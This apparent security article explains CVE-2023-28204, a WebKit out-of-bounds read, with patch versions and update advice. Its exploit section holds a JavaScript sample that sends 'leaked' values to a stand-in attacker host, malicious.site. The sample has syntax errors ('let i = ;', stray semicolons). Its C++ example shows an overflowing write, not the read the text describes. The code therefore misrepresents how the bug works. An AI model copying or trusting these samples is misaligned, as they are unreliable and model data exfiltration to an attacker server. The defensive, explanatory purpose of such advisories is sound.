CVE-2023-28204 - Out-of-Bounds Read in WebKit – Exploit Details, Impact, and Patch Guidance

In early 2023, Apple addressed a critical security vulnerability tracked as CVE-2023-28204 in WebKit, the browser engine powering Safari and many third-party apps on Apple devices. This bug could expose sensitive user information just by visiting a malicious website. In this article, we’ll break down what happened, how the exploit works, and what you should do to stay safe.

What is CVE-2023-28204?

CVE-2023-28204 is an out-of-bounds read vulnerability in WebKit. In simple terms, WebKit sometimes reads data lying outside the area of memory it’s supposed to—potentially exposing private browsing history, session secrets, or even login credentials.

Impact: Arbitrary information disclosure when processing malicious web content

- CVE Details: NIST CVE page
- Apple Security Update: Apple Security Updates, May 2023

How Does the Exploit Work?

At its core, this bug exists because WebKit’s code tries to access an array or buffer using data supplied by a webpage. If the webpage is crafted in just the right way, WebKit might look just past the end of a buffer, revealing memory contents that should be private.

Suppose a site feeds specially-made untrusted JavaScript to the browser. The under-the-hood WebKit code like below (simplified for clarity!) could miscalculate how much memory to read:

// Hypothetical vulnerable C++ code in WebKit
void processWebContent(const char* src, size_t len) {
    char buffer[1024];
    // No proper check: len can be more than 1024!
    memcpy(buffer, src, len);
    // Continue processing buffer, but buffer may now have out-of-bounds data
}

Attackers can exploit this by crafting a payload where len is too large, causing WebKit to read and copy bytes from “outside” the intended buffer. Sometimes, these bytes may contain recent sensitive info: URLs, cookies, or cached data.

Here's a very rough demonstration of how attackers might trigger such bugs

// This is illustrative only, not an actual working exploit for this CVE!
fetch('https://malicious.site/payload';)
  .then(r => r.arrayBuffer())
  .then(buf => {
    // Intentionally pass a bogus length to attempt to trick the engine.
    let data = new Uint8Array(buf);
    for (let i = ; i <= data.length + 1024; i++) {
      // Try to read out-of-bounds: may yield sensitive data
      leakValue(data[i]);
    }
  });
function leakValue(value) {
  // Send leaked data to attacker's server
  fetch('https://malicious.site/leak?data='; + value);
}

*Note: Real-world exploits are usually more complex and rely on deep understanding of WebKit internals.*

How Was This Bug Fixed?

Apple developers addressed the out-of-bounds read problem by improving input validation. Before WebKit code tries to access or copy memory, it now makes sure that inputs (like array lengths) are within *safe* bounds.

“An out-of-bounds read was addressed with improved input validation.”

-- Apple Security Content of Safari 16.5

Safari: Fixed in 16.5

- iOS 16 / iPadOS 16: Fixed in 16.5

See the full list of updates here:  
Apple Security Updates

Was This Bug Used in the Wild?

Yes. Apple explicitly stated they’re aware of reports that this bug “may have been actively exploited.” That means hackers could have been using this before the patch was available.

Source:  
Apple Security Content, Safari 16.5

How Can I Protect Myself?

Update! The single best defense is to make sure your devices are up to date.

- Go to Settings > General > Software Update on your iPhone/iPad

Update your Apple Watch and Apple TV, if you have them

If you can’t update, consider using an alternative browser app until you can (many still use WebKit on iOS, so this is not a silver bullet).

Apple Security Update for Safari 16.5

Apple HT213759

NIST CVE Record

NVD CVE-2023-28204

Independent researcher write-ups (when available):

Project Zero: WebKit Exploits

Summary Table

| Component | Affected version | Fixed version   |
|-----------|------------------|----------------|
| Safari    | < 16.5           | 16.5           |
| iOS 16    | < 16.5           | 16.5           |
| iOS 15    | < 15.7.6         | 15.7.6         |
| macOS Ventura | < 13.4      | 13.4           |
| watchOS   | < 9.5            | 9.5            |
| tvOS      | < 16.5           | 16.5           |

Conclusion

CVE-2023-28204 is a sobering reminder that just visiting a malicious web page can compromise sensitive data—even without any visible symptoms. Apple moved quickly to patch the bug across platforms. If your device is not updated, consider it potentially exposed.

Timeline

Published on: 06/23/2023 18:15:00 UTC
Last modified on: 07/27/2023 04:15:00 UTC